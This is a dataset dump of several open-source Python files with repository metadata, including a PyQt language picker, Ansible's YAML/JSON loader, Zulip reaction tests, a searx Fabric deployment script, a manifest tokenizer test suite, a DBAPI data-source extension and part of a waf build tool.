repo_name (string, 5-100 chars) | path (string, 4-299 chars) | copies (class, 990 values) | size (string, 4-7 chars) | content (string, 666-1.03M chars) | license (class, 15 values) | hash (int64) | line_mean (float64, 3.17-100) | line_max (int64, 7-1k) | alpha_frac (float64, 0.25-0.98) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
LegoStormtroopr/canard | SQBLWidgets/languagePicker.py | 1 | 4028 | import sqblUI
from SQBLutil import * # Don't like this, need to fix later.
from PyQt4 import QtGui, QtCore
import isoLangCodes
from lxml import etree
def languagePickerDialog(title = "Enter Language", default = None):
lang,success = QtGui.QInputDialog.getItem(None,
title,
"""Enter a <a href='http://en.wikipedia.org/wiki/ISO_639 '>2 letter ISO 639 Language Code ID</a>,<br>or select a common country from the list.<br>
<br>
This list of languages was selected from the <a href="en.wikipedia.org/wiki/Global_Internet_usage#Internet_users_by_language">Top 10 languages used on the Internet</a>.<br>
American English was added, due to the large number of native users within Information Technology.""",
[""]+isoLangCodes.languageCodeList(),
current = 0,
editable = False,
)
if success:
# They entered a language successfully, good for them.
lang = lang[0:2]
lang = unicode(lang)
return (lang,success)
class LanguagePickerWidget(QtGui.QWidget,sqblUI.languagePicker.Ui_Form):
# Signal emitted if current language in the language combo box changes
# String emitted is an iso639 code
currentLanguageChanged = QtCore.pyqtSignal(str)
# String emitted is an iso639 code
languageAdded = QtCore.pyqtSignal(str)
# String emitted is an iso639 code
languageRemoved = QtCore.pyqtSignal(str)
# language and languages are iso639 languages codes
def __init__(self,language=None,languages=[],hideLabel=False):
QtGui.QWidget.__init__(self)
self.setupUi(self)
self.currentLanguage = language
languages.append(language)
self.languages = sorted(list(set(languages)))
self.configureLanguages(self.languageList)
self.addLanguageButton.clicked.connect(self.addLanguage)
self.removeLanguageButton.clicked.connect(self.removeLanguage)
self.languageList.currentIndexChanged[int].connect(self.updateLanguage)
if language in self.languages:
self.languageList.setCurrentIndex(self.languages.index(language))
else:
self.languageList.setCurrentIndex(0)
def removeLanguage(self):
index = self.languageList.currentIndex()
lang = self.languageList.itemData(index)
self.languages.remove(lang)
self.languageList.removeItem(index)
self.languageRemoved.emit(lang.toPyObject())
def addLanguage(self,lang):
lang, success = languagePickerDialog()
if lang is None or lang == "":
return
lang = str(lang)
if success and lang not in self.languages:
self.languageAdded.emit(lang)
self.languages.append(lang)
self.languages.sort()
self.languageList.addItem(isoLangCodes.iso639CodeToString(lang),lang)
if lang in self.languages:
self.languageList.setCurrentIndex(self.languageList.findData(lang))
def setLanguage(self,language):
if language in self.languages:
self.languageList.setCurrentIndex(self.languages.index(language))
self.updateLanguage(self.languages.index(language))
def updateLanguage(self,index):
self.currentLanguage = str(self.languageList.itemData(index).toPyObject())
self.currentLanguageChanged.emit(self.currentLanguage)
def configureLanguages(self,comboWidget,interfaceLanguage="en"):
cw = comboWidget # Just because it's easier to refer to
for lang in self.languages:
langName = isoLangCodes.iso639CodeToString(lang)
cw.addItem(langName,lang)
if len(self.languages) == 0:
#There are no languages, so we'll add the current interface language to make sure something is there.
cw.addItem(interfaceLanguage)
langIndex = self.languageList.findData(self.currentLanguage)
self.languageList.setCurrentIndex(max(0,langIndex))
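# Illustrative only: wiring the widget's signals into a hypothetical parent
# dialog (none of the slot names below exist in this module):
#
#   picker = LanguagePickerWidget(language="en", languages=["en", "es"])
#   picker.currentLanguageChanged.connect(parent.onCurrentLanguageChanged)
#   picker.languageAdded.connect(parent.onLanguageAdded)
#   picker.languageRemoved.connect(parent.onLanguageRemoved)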
| gpl-3.0 | 3,230,996,148,769,951,000 | 40.102041 | 184 | 0.676266 | false |
bols-blue/ansible | lib/ansible/parsing/__init__.py | 19 | 7957 | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import os
from yaml import load, YAMLError
from ansible.errors import AnsibleParserError
from ansible.errors.yaml_strings import YAML_SYNTAX_ERROR
from ansible.parsing.vault import VaultLib
from ansible.parsing.splitter import unquote
from ansible.parsing.yaml.loader import AnsibleLoader
from ansible.parsing.yaml.objects import AnsibleBaseYAMLObject, AnsibleUnicode
from ansible.utils.path import unfrackpath
class DataLoader():
'''
The DataLoader class is used to load and parse YAML or JSON content,
either from a given file name or from a string that was previously
read in through other means. A Vault password can be specified, and
any vault-encrypted files will be decrypted.
Data read from files will also be cached, so the file will never be
read from disk more than once.
Usage:
dl = DataLoader()
(or)
dl = DataLoader(vault_password='foo')
ds = dl.load('...')
ds = dl.load_from_file('/path/to/file')
'''
def __init__(self, vault_password=None):
self._basedir = '.'
self._vault_password = vault_password
self._FILE_CACHE = dict()
self._vault = VaultLib(password=vault_password)
def load(self, data, file_name='<string>', show_content=True):
'''
Creates a python datastructure from the given data, which can be either
a JSON or YAML string.
'''
try:
# we first try to load this data as JSON
return json.loads(data)
except:
# if loading JSON failed for any reason, we go ahead
# and try to parse it as YAML instead
if isinstance(data, AnsibleUnicode):
# The PyYAML's libyaml bindings use PyUnicode_CheckExact so
# they are unable to cope with our subclass.
# Unwrap and re-wrap the unicode so we can keep track of line
# numbers
new_data = unicode(data)
else:
new_data = data
try:
new_data = self._safe_load(new_data, file_name=file_name)
except YAMLError as yaml_exc:
self._handle_error(yaml_exc, file_name, show_content)
if isinstance(data, AnsibleUnicode):
new_data = AnsibleUnicode(new_data)
new_data.ansible_pos = data.ansible_pos
return new_data
def load_from_file(self, file_name):
''' Loads data from a file, which can contain either JSON or YAML. '''
file_name = self.path_dwim(file_name)
# if the file has already been read in and cached, we'll
# return those results to avoid more file/vault operations
if file_name in self._FILE_CACHE:
return self._FILE_CACHE[file_name]
# read the file contents and load the data structure from them
(file_data, show_content) = self._get_file_contents(file_name)
parsed_data = self.load(data=file_data, file_name=file_name, show_content=show_content)
# cache the file contents for next time
self._FILE_CACHE[file_name] = parsed_data
return parsed_data
def path_exists(self, path):
return os.path.exists(path)
def is_file(self, path):
return os.path.isfile(path)
def is_directory(self, path):
return os.path.isdir(path)
def list_directory(self, path):
return os.listdir(path)
def _safe_load(self, stream, file_name=None):
''' Implements yaml.safe_load(), except using our custom loader class. '''
loader = AnsibleLoader(stream, file_name)
try:
return loader.get_single_data()
finally:
loader.dispose()
def _get_file_contents(self, file_name):
'''
Reads the file contents from the given file name, and will decrypt them
if they are found to be vault-encrypted.
'''
if not self.path_exists(file_name) or not self.is_file(file_name):
raise AnsibleParserError("the file_name '%s' does not exist, or is not readable" % file_name)
show_content = True
try:
with open(file_name, 'r') as f:
data = f.read()
if self._vault.is_encrypted(data):
data = self._vault.decrypt(data)
show_content = False
return (data, show_content)
except (IOError, OSError) as e:
raise AnsibleParserError("an error occurred while trying to read the file '%s': %s" % (file_name, str(e)))
def _handle_error(self, yaml_exc, file_name, show_content):
'''
Optionally constructs an object (AnsibleBaseYAMLObject) to encapsulate the
file name/position where a YAML exception occurred, and raises an AnsibleParserError
to display the syntax exception information.
'''
# if the YAML exception contains a problem mark, use it to construct
# an object the error class can use to display the faulty line
err_obj = None
if hasattr(yaml_exc, 'problem_mark'):
err_obj = AnsibleBaseYAMLObject()
err_obj.ansible_pos = (file_name, yaml_exc.problem_mark.line + 1, yaml_exc.problem_mark.column + 1)
raise AnsibleParserError(YAML_SYNTAX_ERROR, obj=err_obj, show_content=show_content)
def get_basedir(self):
''' returns the current basedir '''
return self._basedir
def set_basedir(self, basedir):
''' sets the base directory, used to find files when a relative path is given '''
if basedir is not None:
self._basedir = basedir
def path_dwim(self, given):
'''
make relative paths work like folks expect.
'''
given = unquote(given)
if given.startswith("/"):
return os.path.abspath(given)
elif given.startswith("~"):
return os.path.abspath(os.path.expanduser(given))
else:
return os.path.abspath(os.path.join(self._basedir, given))
def path_dwim_relative(self, role_path, dirname, source):
''' find one file in a directory one level up in a dir named dirname relative to current '''
basedir = os.path.dirname(role_path)
if os.path.islink(basedir):
basedir = unfrackpath(basedir)
template2 = os.path.join(basedir, dirname, source)
else:
template2 = os.path.join(basedir, '..', dirname, source)
source1 = os.path.join(role_path, dirname, source)
if os.path.exists(source1):
return source1
cur_basedir = self._basedir
self.set_basedir(basedir)
source2 = self.path_dwim(template2)
if os.path.exists(source2):
self.set_basedir(cur_basedir)
return source2
obvious_local_path = self.path_dwim(source)
if os.path.exists(obvious_local_path):
self.set_basedir(cur_basedir)
return obvious_local_path
self.set_basedir(cur_basedir)
return source2 # which does not exist
| gpl-3.0 | 911,921,087,727,697,300 | 34.842342 | 118 | 0.628629 | false |
dattatreya303/zulip | zerver/tests/test_reactions.py | 13 | 10382 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import ujson
from typing import Any, Dict, List
from six import string_types
from zerver.lib.test_helpers import tornado_redirected_to_list, get_display_recipient
from zerver.lib.test_classes import ZulipTestCase
from zerver.models import get_user_profile_by_email
class ReactionEmojiTest(ZulipTestCase):
def test_missing_emoji(self):
# type: () -> None
"""
Sending reaction without emoji fails
"""
sender = '[email protected]'
result = self.client_put('/api/v1/messages/1/emoji_reactions/',
**self.api_auth(sender))
self.assertEqual(result.status_code, 400)
def test_add_invalid_emoji(self):
# type: () -> None
"""
Sending invalid emoji fails
"""
sender = '[email protected]'
result = self.client_put('/api/v1/messages/1/emoji_reactions/foo',
**self.api_auth(sender))
self.assert_json_error(result, "Emoji 'foo' does not exist")
def test_remove_invalid_emoji(self):
# type: () -> None
"""
Removing invalid emoji fails
"""
sender = '[email protected]'
result = self.client_delete('/api/v1/messages/1/emoji_reactions/foo',
**self.api_auth(sender))
self.assert_json_error(result, "Emoji 'foo' does not exist")
def test_valid_emoji(self):
# type: () -> None
"""
Reacting with valid emoji succeeds
"""
sender = '[email protected]'
result = self.client_put('/api/v1/messages/1/emoji_reactions/smile',
**self.api_auth(sender))
self.assert_json_success(result)
self.assertEqual(200, result.status_code)
def test_valid_realm_emoji(self):
# type: () -> None
"""
Reacting with valid realm emoji succeeds
"""
sender = '[email protected]'
emoji_name = 'my_emoji'
emoji_data = {'url': 'https://example.com/my_emoji'}
result = self.client_put('/json/realm/emoji/my_emoji', info=emoji_data,
**self.api_auth(sender))
self.assert_json_success(result)
self.assertEqual(200, result.status_code)
result = self.client_get("/json/realm/emoji", **self.api_auth(sender))
content = ujson.loads(result.content)
self.assert_json_success(result)
self.assertTrue(emoji_name in content["emoji"])
result = self.client_put('/api/v1/messages/1/emoji_reactions/%s' % (emoji_name,),
**self.api_auth(sender))
self.assert_json_success(result)
class ReactionMessageIDTest(ZulipTestCase):
def test_missing_message_id(self):
# type: () -> None
"""
Reacting without a message_id fails
"""
sender = '[email protected]'
result = self.client_put('/api/v1/messages//emoji_reactions/smile',
**self.api_auth(sender))
self.assertEqual(result.status_code, 404)
def test_invalid_message_id(self):
# type: () -> None
"""
Reacting to an invalid message id fails
"""
sender = '[email protected]'
result = self.client_put('/api/v1/messages/-1/emoji_reactions/smile',
**self.api_auth(sender))
self.assertEqual(result.status_code, 404)
def test_inaccessible_message_id(self):
# type: () -> None
"""
Reacting to an inaccessible (for instance, private) message fails
"""
pm_sender = '[email protected]'
pm_recipient = '[email protected]'
reaction_sender = '[email protected]'
result = self.client_post("/api/v1/messages", {"type": "private",
"content": "Test message",
"to": pm_recipient},
**self.api_auth(pm_sender))
self.assert_json_success(result)
content = ujson.loads(result.content)
pm_id = content['id']
result = self.client_put('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_error(result, "Invalid message(s)")
class ReactionTest(ZulipTestCase):
def test_add_existing_reaction(self):
# type: () -> None
"""
Creating the same reaction twice fails
"""
pm_sender = '[email protected]'
pm_recipient = '[email protected]'
reaction_sender = pm_recipient
pm = self.client_post("/api/v1/messages", {"type": "private",
"content": "Test message",
"to": pm_recipient},
**self.api_auth(pm_sender))
self.assert_json_success(pm)
content = ujson.loads(pm.content)
pm_id = content['id']
first = self.client_put('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_success(first)
second = self.client_put('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_error(second, "Reaction already exists")
def test_remove_nonexisting_reaction(self):
# type: () -> None
"""
Removing a reaction twice fails
"""
pm_sender = '[email protected]'
pm_recipient = '[email protected]'
reaction_sender = pm_recipient
pm = self.client_post("/api/v1/messages", {"type": "private",
"content": "Test message",
"to": pm_recipient},
**self.api_auth(pm_sender))
self.assert_json_success(pm)
content = ujson.loads(pm.content)
pm_id = content['id']
add = self.client_put('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_success(add)
first = self.client_delete('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_success(first)
second = self.client_delete('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_error(second, "Reaction does not exist")
class ReactionEventTest(ZulipTestCase):
def test_add_event(self):
# type: () -> None
"""
Recipients of the message receive the reaction event
and event contains relevant data
"""
pm_sender = '[email protected]'
pm_recipient = '[email protected]'
reaction_sender = pm_recipient
result = self.client_post("/api/v1/messages", {"type": "private",
"content": "Test message",
"to": pm_recipient},
**self.api_auth(pm_sender))
self.assert_json_success(result)
content = ujson.loads(result.content)
pm_id = content['id']
expected_recipient_emails = set([pm_sender, pm_recipient])
expected_recipient_ids = set([get_user_profile_by_email(email).id for email in expected_recipient_emails])
events = [] # type: List[Dict[str, Any]]
with tornado_redirected_to_list(events):
result = self.client_put('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_success(result)
self.assertEqual(len(events), 1)
event = events[0]['event']
event_user_ids = set(events[0]['users'])
self.assertEqual(expected_recipient_ids, event_user_ids)
self.assertEqual(event['user']['email'], reaction_sender)
self.assertEqual(event['type'], 'reaction')
self.assertEqual(event['op'], 'add')
self.assertEqual(event['emoji_name'], 'smile')
self.assertEqual(event['message_id'], pm_id)
def test_remove_event(self):
# type: () -> None
"""
Recipients of the message receive the reaction event
and event contains relevant data
"""
pm_sender = '[email protected]'
pm_recipient = '[email protected]'
reaction_sender = pm_recipient
result = self.client_post("/api/v1/messages", {"type": "private",
"content": "Test message",
"to": pm_recipient},
**self.api_auth(pm_sender))
self.assert_json_success(result)
content = ujson.loads(result.content)
pm_id = content['id']
expected_recipient_emails = set([pm_sender, pm_recipient])
expected_recipient_ids = set([get_user_profile_by_email(email).id for email in expected_recipient_emails])
add = self.client_put('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_success(add)
events = [] # type: List[Dict[str, Any]]
with tornado_redirected_to_list(events):
result = self.client_delete('/api/v1/messages/%s/emoji_reactions/smile' % (pm_id,),
**self.api_auth(reaction_sender))
self.assert_json_success(result)
self.assertEqual(len(events), 1)
event = events[0]['event']
event_user_ids = set(events[0]['users'])
self.assertEqual(expected_recipient_ids, event_user_ids)
self.assertEqual(event['user']['email'], reaction_sender)
self.assertEqual(event['type'], 'reaction')
self.assertEqual(event['op'], 'remove')
self.assertEqual(event['emoji_name'], 'smile')
self.assertEqual(event['message_id'], pm_id)
| apache-2.0 | 8,963,641,880,823,532,000 | 40.528 | 114 | 0.541803 | false |
PwnArt1st/searx | utils/fabfile.py | 8 | 2621 | from fabric.api import cd, run, sudo, put
from cStringIO import StringIO
base_dir = '/usr/local'
hostname = 'searx.me'
searx_dir = base_dir + '/searx'
searx_ve_dir = searx_dir + '/searx-ve'
current_user = run('whoami').stdout.strip()
uwsgi_file = '''
[uwsgi]
# Who will run the code
uid = {user}
gid = {user}
# Number of workers
workers = 8
# The right granted on the created socket
chmod-socket = 666
# Plugin to use and interpretor config
single-interpreter = true
master = true
plugin = python
# Module to import
module = searx.webapp
# Virtualenv and python path
virtualenv = {searx_ve_dir}
pythonpath = {searx_dir}
chdir = {searx_dir}/searx
'''.format(user=current_user,
searx_dir=searx_dir,
searx_ve_dir=searx_ve_dir)
nginx_config = '''
server {{
listen 80;
server_name {hostname};
server_name www.{hostname};
root /usr/local/searx;
location / {{
include uwsgi_params;
uwsgi_pass unix:/run/uwsgi/app/searx/socket;
}}
}}
'''.format(hostname=hostname)
def stop():
sudo('/etc/init.d/uwsgi stop')
def start():
sudo('/etc/init.d/uwsgi start')
def restart():
sudo('/etc/init.d/uwsgi restart')
def init():
if not run('test -d ' + searx_dir, warn_only=True).failed:
return
sudo('apt-get update')
sudo('apt-get install git'
' build-essential'
' libxslt-dev'
' python-dev'
' python-virtualenv'
' python-pybabel'
' zlib1g-dev'
' uwsgi'
' uwsgi-plugin-python'
' nginx')
sudo('mkdir -p ' + base_dir)
put(StringIO(nginx_config), '/etc/nginx/sites-enabled/searx', use_sudo=True)
sudo('/etc/init.d/nginx restart')
with cd(base_dir):
sudo('git clone https://github.com/asciimoo/searx')
sudo('chown -R {user}:{user} {searx_dir}'.format(user=current_user, searx_dir=searx_dir))
put(StringIO(uwsgi_file), searx_dir + '/uwsgi.ini')
sudo('ln -s {0}/uwsgi.ini /etc/uwsgi/apps-enabled/searx.ini'.format(searx_dir))
run('virtualenv {0}'.format(searx_ve_dir))
with cd(searx_dir):
run('source {0}/bin/activate && pip install -r requirements.txt'.format(searx_ve_dir))
start()
def deploy():
init()
with cd(searx_dir):
run("git stash", warn_only=True)
run("git pull origin master")
run("git stash pop", warn_only=True)
restart()
def clean():
sudo('rm -rf {searx_dir}'.format(searx_dir=searx_dir), warn_only=True)
sudo('rm /etc/uwsgi/apps-enabled/searx.ini', warn_only=True)
sudo('rm /etc/nginx/sites-enabled/searx', warn_only=True)
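# Typical invocations with Fabric 1.x (the hostname is the one defined above;
# adjust it to your own deployment target):
#
#   fab -H searx.me deploy   # first run bootstraps the host, later runs update
#   fab -H searx.me clean    # remove the installation again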
| agpl-3.0 | 6,148,656,638,491,134,000 | 21.401709 | 94 | 0.622663 | false |
atheed/servo | tests/wpt/harness/wptrunner/wptmanifest/tests/test_tokenizer.py | 195 | 11355 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import sys
import os
import unittest
sys.path.insert(0, os.path.abspath(".."))
from cStringIO import StringIO
from .. import parser
from ..parser import token_types
class TokenizerTest(unittest.TestCase):
def setUp(self):
self.tokenizer = parser.Tokenizer()
def tokenize(self, input_str):
rv = []
for item in self.tokenizer.tokenize(StringIO(input_str)):
rv.append(item)
if item[0] == token_types.eof:
break
return rv
def compare(self, input_text, expected):
expected = expected + [(token_types.eof, None)]
actual = self.tokenize(input_text)
self.assertEquals(actual, expected)
def test_heading_0(self):
self.compare("""[Heading text]""",
[(token_types.paren, "["),
(token_types.string, "Heading text"),
(token_types.paren, "]")])
def test_heading_1(self):
self.compare("""[Heading [text\]]""",
[(token_types.paren, "["),
(token_types.string, "Heading [text]"),
(token_types.paren, "]")])
def test_heading_2(self):
self.compare("""[Heading #text]""",
[(token_types.paren, "["),
(token_types.string, "Heading #text"),
(token_types.paren, "]")])
def test_heading_3(self):
self.compare("""[Heading [\]text]""",
[(token_types.paren, "["),
(token_types.string, "Heading []text"),
(token_types.paren, "]")])
def test_heading_4(self):
with self.assertRaises(parser.ParseError):
self.tokenize("[Heading")
def test_heading_5(self):
self.compare("""[Heading [\]text] #comment""",
[(token_types.paren, "["),
(token_types.string, "Heading []text"),
(token_types.paren, "]")])
def test_heading_6(self):
self.compare(r"""[Heading \ttext]""",
[(token_types.paren, "["),
(token_types.string, "Heading \ttext"),
(token_types.paren, "]")])
def test_key_0(self):
self.compare("""key:value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_key_1(self):
self.compare("""key : value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_key_2(self):
self.compare("""key : val ue""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "val ue")])
def test_key_3(self):
self.compare("""key: value#comment""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_key_4(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""ke y: value""")
def test_key_5(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""key""")
def test_key_6(self):
self.compare("""key: "value\"""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_key_7(self):
self.compare("""key: 'value'""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_key_8(self):
self.compare("""key: "#value\"""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "#value")])
def test_key_9(self):
self.compare("""key: '#value\'""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, "#value")])
def test_key_10(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""key: "value""")
def test_key_11(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""key: 'value""")
def test_key_12(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""key: 'value""")
def test_key_13(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""key: 'value' abc""")
def test_key_14(self):
self.compare(r"""key: \\nb""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.string, r"\nb")])
def test_list_0(self):
self.compare(
"""
key: []""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.list_start, "["),
(token_types.list_end, "]")])
def test_list_1(self):
self.compare(
"""
key: [a, "b"]""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.list_start, "["),
(token_types.string, "a"),
(token_types.string, "b"),
(token_types.list_end, "]")])
def test_list_2(self):
self.compare(
"""
key: [a,
b]""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.list_start, "["),
(token_types.string, "a"),
(token_types.string, "b"),
(token_types.list_end, "]")])
def test_list_3(self):
self.compare(
"""
key: [a, #b]
c]""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.list_start, "["),
(token_types.string, "a"),
(token_types.string, "c"),
(token_types.list_end, "]")])
def test_list_4(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""key: [a #b]
c]""")
def test_list_5(self):
with self.assertRaises(parser.ParseError):
self.tokenize("""key: [a \\
c]""")
def test_list_6(self):
self.compare(
"""key: [a , b]""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.list_start, "["),
(token_types.string, "a"),
(token_types.string, "b"),
(token_types.list_end, "]")])
def test_expr_0(self):
self.compare(
"""
key:
if cond == 1: value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.ident, "cond"),
(token_types.ident, "=="),
(token_types.number, "1"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_expr_1(self):
self.compare(
"""
key:
if cond == 1: value1
value2""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.ident, "cond"),
(token_types.ident, "=="),
(token_types.number, "1"),
(token_types.separator, ":"),
(token_types.string, "value1"),
(token_types.string, "value2")])
def test_expr_2(self):
self.compare(
"""
key:
if cond=="1": value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.ident, "cond"),
(token_types.ident, "=="),
(token_types.string, "1"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_expr_3(self):
self.compare(
"""
key:
if cond==1.1: value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.ident, "cond"),
(token_types.ident, "=="),
(token_types.number, "1.1"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_expr_4(self):
self.compare(
"""
key:
if cond==1.1 and cond2 == "a": value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.ident, "cond"),
(token_types.ident, "=="),
(token_types.number, "1.1"),
(token_types.ident, "and"),
(token_types.ident, "cond2"),
(token_types.ident, "=="),
(token_types.string, "a"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_expr_5(self):
self.compare(
"""
key:
if (cond==1.1 ): value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.paren, "("),
(token_types.ident, "cond"),
(token_types.ident, "=="),
(token_types.number, "1.1"),
(token_types.paren, ")"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_expr_6(self):
self.compare(
"""
key:
if "\\ttest": value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.string, "\ttest"),
(token_types.separator, ":"),
(token_types.string, "value")])
def test_expr_7(self):
with self.assertRaises(parser.ParseError):
self.tokenize(
"""
key:
if 1A: value""")
def test_expr_8(self):
with self.assertRaises(parser.ParseError):
self.tokenize(
"""
key:
if 1a: value""")
def test_expr_9(self):
with self.assertRaises(parser.ParseError):
self.tokenize(
"""
key:
if 1.1.1: value""")
def test_expr_10(self):
self.compare(
"""
key:
if 1.: value""",
[(token_types.string, "key"),
(token_types.separator, ":"),
(token_types.group_start, None),
(token_types.ident, "if"),
(token_types.number, "1."),
(token_types.separator, ":"),
(token_types.string, "value")])
if __name__ == "__main__":
unittest.main()
| mpl-2.0 | -2,026,876,783,122,045,200 | 30.454294 | 75 | 0.471422 | false |
jnmclarty/trump | trump/extensions/source/tx-dbapi/dbapiext.py | 2 | 2524 | """
The DBAPI driver, will use by default the same driver SQLAlchemy is using for trump.
There is currently no way to change this default. It's assumed that the driver
is DBAPI 2.0 compliant.
Required kwargs include:
- 'dbinstype' which must be one of 'COMMAND', 'KEYCOL', 'TWOKEYCOL'
- 'dsn', 'user', 'password', 'host', 'database', 'port'
Optional kwargs include:
- duphandler ['sum'] which just groups duplicate index values together via the sum.
Additional kwargs:
Required based on 'dbinsttype' chosen:
'COMMAND' :
- 'command' which is just a SQL string, where the first column becomes the index, and the second
column becomes the data.
'KEYCOL' :
- ['indexcol', 'datacol', 'table', 'keycol', 'key']
'TWOKEYCOL' :
- ['indexcol', 'datacol', 'table', 'keyacol', 'keya', 'keybcol', 'keyb']
"""
stype = 'DBAPI'
renew = True
class Source(object):
def __init__(self, ses, **kwargs):
db = __import__(ses.bind.driver)
dbargs = ['dsn', 'user', 'password', 'host', 'database', 'port']
con_kwargs = {k: v for k, v in kwargs.items() if k in dbargs}
self.con = db.connect(**con_kwargs)
import pandas as pd
self.pd = pd
def getseries(self, ses, **kwargs):
cur = self.con.cursor()
if kwargs['dbinstype'] == 'COMMAND':
qry = kwargs['command']
elif kwargs['dbinstype'] == 'KEYCOL':
reqd = ['indexcol', 'datacol', 'table', 'keycol', 'key']
rel = (kwargs[c] for c in reqd)
qry = "SELECT {0},{1} FROM {2} WHERE {3} = '{4}' ORDER BY {0};"
qry = qry.format(*rel)
elif kwargs['dbinstype'] == 'TWOKEYCOL':
reqd = ['indexcol', 'datacol', 'table', 'keyacol', 'keya', 'keybcol', 'keyb']
rel = (kwargs[c] for c in reqd)
qry = "SELECT {0},{1} FROM {2} WHERE {3} = '{4}' AND {5} = '{6}' ORDER BY {0};"
qry = qry.format(*rel)
else:
raise NotImplementedError("The database type {} has not been created.".format(kwargs['dbinstype']))
cur.execute(qry)
results = [(row[0], row[1]) for row in cur.fetchall()]
if len(results):
ind, dat = zip(*results)
else:
ind, dat = [], []
data = self.pd.Series(dat, ind)
try:
dosum = kwargs['duphandler'] == 'sum'
except:
dosum = False
if dosum:
data = data.groupby(data.index).sum()
return data
| bsd-3-clause | 4,612,658,125,963,389,000 | 31.358974 | 111 | 0.553487 | false |
cyc805/VM | waf-tools/misc.py | 53 | 11741 | #!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2006-2010 (ita)
"""
This tool is totally deprecated
Try using:
.pc.in files for .pc files
the feature intltool_in - see demos/intltool
make-like rules
"""
import shutil, re, os
from waflib import TaskGen, Node, Task, Utils, Build, Errors
from waflib.TaskGen import feature, after_method, before_method
from waflib.Logs import debug
def copy_attrs(orig, dest, names, only_if_set=False):
"""
copy class attributes from an object to another
"""
for a in Utils.to_list(names):
u = getattr(orig, a, ())
if u or not only_if_set:
setattr(dest, a, u)
def copy_func(tsk):
"Make a file copy. This might be used to make other kinds of file processing (even calling a compiler is possible)"
env = tsk.env
infile = tsk.inputs[0].abspath()
outfile = tsk.outputs[0].abspath()
try:
shutil.copy2(infile, outfile)
except (OSError, IOError):
return 1
else:
if tsk.chmod: os.chmod(outfile, tsk.chmod)
return 0
def action_process_file_func(tsk):
"Ask the function attached to the task to process it"
if not tsk.fun: raise Errors.WafError('task must have a function attached to it for copy_func to work!')
return tsk.fun(tsk)
@feature('cmd')
def apply_cmd(self):
"call a command everytime"
if not self.fun: raise Errors.WafError('cmdobj needs a function!')
tsk = Task.TaskBase()
tsk.fun = self.fun
tsk.env = self.env
self.tasks.append(tsk)
tsk.install_path = self.install_path
@feature('copy')
@before_method('process_source')
def apply_copy(self):
Utils.def_attrs(self, fun=copy_func)
self.default_install_path = 0
lst = self.to_list(self.source)
self.meths.remove('process_source')
for filename in lst:
node = self.path.find_resource(filename)
